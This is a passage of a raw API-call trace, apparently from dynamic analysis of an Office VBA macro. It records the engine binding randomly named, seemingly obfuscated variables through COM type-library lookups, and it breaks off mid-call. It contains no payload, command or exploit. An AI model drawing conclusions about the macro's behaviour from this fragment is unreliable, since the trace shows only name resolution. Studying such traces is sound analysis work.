lpMultiByteStr=0x3cb243e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="L_BBww") returned 7 [0069.963] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="L_BBww", lHashVal=0x103770, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb243e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="L_BBww") returned 7 [0069.963] ITypeComp:RemoteBind (in: This=0x665bd30, szName="L_BBww", lHashVal=0x103770, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.963] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="L_BBww") returned 0x103770 [0069.963] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="L_BBww" | out: _Dst="L_BBww") returned 0x0 [0069.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="L_BBww") returned 7 [0069.963] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.963] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="L_BBww", lHashVal=0x103770, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.963] IUnknown:Release (This=0x665ba50) returned 0xf [0069.963] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.963] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="L_BBww", lHashVal=0x103770, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.963] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.963] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.963] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="L_BBww", lHashVal=0x103770, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.964] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.964] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.964] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="L_BBww", lHashVal=0x103770, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.964] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb243e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="L_BBww") returned 7 [0069.964] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="L_BBww", lHashVal=0x103770, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.964] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0069.964] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3cb243e | out: _Dst=0x68767a0) returned 0x0 [0069.964] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_L_BBww") returned 0x10b219 [0069.964] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_L_BBww" | out: _Dst="_B_var_L_BBww") returned 0x0 [0069.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_L_BBww") returned 14 [0069.964] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.964] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_L_BBww", lHashVal=0x10b219, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.964] IUnknown:Release (This=0x665ba50) returned 0xf [0069.964] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.964] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_L_BBww", lHashVal=0x10b219, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.964] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.964] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.964] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_L_BBww", lHashVal=0x10b219, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.964] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.964] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.964] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_L_BBww", lHashVal=0x10b219, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.964] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.964] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.964] IUnknown:Release (This=0x665ba50) returned 0xf [0069.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d18de, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_L_BBww") returned 14 [0069.964] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_L_BBww", lHashVal=0x10b219, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x77004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x77004200000000, pDummy=0x0) returned 0x0 [0069.965] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb243e | out: _Dst=0x144ec0) returned 0x0 [0069.965] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ukwcAA1A", lHashVal=0x10df10, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb248e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="ukwcAA1A") returned 9 [0069.965] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ukwcAA1A", lHashVal=0x10df10, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb248e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="ukwcAA1A") returned 9 [0069.965] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ukwcAA1A", lHashVal=0x10df10, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.965] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ukwcAA1A") returned 0x10df10 [0069.965] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="ukwcAA1A" | out: _Dst="ukwcAA1A") returned 0x0 [0069.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="ukwcAA1A") returned 9 [0069.965] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.965] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ukwcAA1A", lHashVal=0x10df10, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.965] IUnknown:Release (This=0x665ba50) returned 0xf [0069.965] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.965] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ukwcAA1A", lHashVal=0x10df10, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.965] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.965] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.965] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ukwcAA1A", lHashVal=0x10df10, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.965] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.965] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.965] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ukwcAA1A", lHashVal=0x10df10, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.965] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb248e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="ukwcAA1A") returned 9 [0069.965] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ukwcAA1A", lHashVal=0x10df10, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.966] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x68767a0 [0069.966] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3cb248e | out: _Dst=0x68767a0) returned 0x0 [0069.966] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ukwcAA1A") returned 0x10b699 [0069.966] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_ukwcAA1A" | out: _Dst="_B_var_ukwcAA1A") returned 0x0 [0069.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_ukwcAA1A") returned 16 [0069.966] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.966] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ukwcAA1A", lHashVal=0x10b699, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.966] IUnknown:Release (This=0x665ba50) returned 0xf [0069.966] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.966] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ukwcAA1A", lHashVal=0x10b699, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.966] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.966] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.966] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ukwcAA1A", lHashVal=0x10b699, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.966] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.966] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.966] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ukwcAA1A", lHashVal=0x10b699, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.966] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.966] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.966] IUnknown:Release (This=0x665ba50) returned 0xf [0069.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d190e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_ukwcAA1A") returned 16 [0069.966] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ukwcAA1A", lHashVal=0x10b699, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0) returned 0x0 [0069.966] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3cb248e | out: _Dst=0x144ec0) returned 0x0 [0069.966] ITypeComp:RemoteBind (in: This=0x665ba60, szName="sDxAUBC", lHashVal=0x10baf3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2466, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="sDxAUBC") returned 8 [0069.967] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="sDxAUBC", lHashVal=0x10baf3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2466, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="sDxAUBC") returned 8 [0069.967] ITypeComp:RemoteBind (in: This=0x665bd30, szName="sDxAUBC", lHashVal=0x10baf3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.967] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sDxAUBC") returned 0x10baf3 [0069.967] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="sDxAUBC" | out: _Dst="sDxAUBC") returned 0x0 [0069.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="sDxAUBC") returned 8 [0069.967] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.967] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="sDxAUBC", lHashVal=0x10baf3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.967] IUnknown:Release (This=0x665ba50) returned 0xf [0069.967] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.967] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="sDxAUBC", lHashVal=0x10baf3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.967] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.967] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.967] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="sDxAUBC", lHashVal=0x10baf3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.967] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.967] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.967] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="sDxAUBC", lHashVal=0x10baf3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.967] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2466, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="sDxAUBC") returned 8 [0069.967] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="sDxAUBC", lHashVal=0x10baf3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.967] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.967] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3cb2466 | out: _Dst=0x68767a0) returned 0x0 [0069.967] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_sDxAUBC") returned 0x10be77 [0069.967] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_sDxAUBC" | out: _Dst="_B_var_sDxAUBC") returned 0x0 [0069.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_sDxAUBC") returned 15 [0069.967] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.968] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_sDxAUBC", lHashVal=0x10be77, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.968] IUnknown:Release (This=0x665ba50) returned 0xf [0069.968] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.968] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_sDxAUBC", lHashVal=0x10be77, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.968] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.968] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.968] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_sDxAUBC", lHashVal=0x10be77, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.968] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.968] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.968] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_sDxAUBC", lHashVal=0x10be77, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.968] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.968] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.968] IUnknown:Release (This=0x665ba50) returned 0xf [0069.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d193e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_sDxAUBC") returned 15 [0069.968] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_sDxAUBC", lHashVal=0x10be77, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x55004100000000, pDummy=0x0) returned 0x0 [0069.968] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb2466 | out: _Dst=0x144ec0) returned 0x0 [0069.968] ITypeComp:RemoteBind (in: This=0x665ba60, szName="lcQkDAx", lHashVal=0x104e1a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb24e2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lcQkDAx") returned 8 [0069.968] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="lcQkDAx", lHashVal=0x104e1a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb24e2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lcQkDAx") returned 8 [0069.969] ITypeComp:RemoteBind (in: This=0x665bd30, szName="lcQkDAx", lHashVal=0x104e1a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.969] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lcQkDAx") returned 0x104e1a [0069.969] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="lcQkDAx" | out: _Dst="lcQkDAx") returned 0x0 [0069.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="lcQkDAx") returned 8 [0069.969] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.969] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="lcQkDAx", lHashVal=0x104e1a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.969] IUnknown:Release (This=0x665ba50) returned 0xf [0069.969] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.969] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="lcQkDAx", lHashVal=0x104e1a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.969] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.969] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.969] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="lcQkDAx", lHashVal=0x104e1a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.969] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.969] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.969] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="lcQkDAx", lHashVal=0x104e1a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.969] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb24e2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lcQkDAx") returned 8 [0069.969] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="lcQkDAx", lHashVal=0x104e1a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.969] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.969] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3cb24e2 | out: _Dst=0x68767a0) returned 0x0 [0069.969] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lcQkDAx") returned 0x10519e [0069.969] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_lcQkDAx" | out: _Dst="_B_var_lcQkDAx") returned 0x0 [0069.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_lcQkDAx") returned 15 [0069.969] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0069.970] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_lcQkDAx", lHashVal=0x10519e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.970] IUnknown:Release (This=0x665ba50) returned 0xf [0069.970] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.970] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_lcQkDAx", lHashVal=0x10519e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.970] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.970] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.970] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_lcQkDAx", lHashVal=0x10519e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.970] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.970] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.970] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_lcQkDAx", lHashVal=0x10519e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, 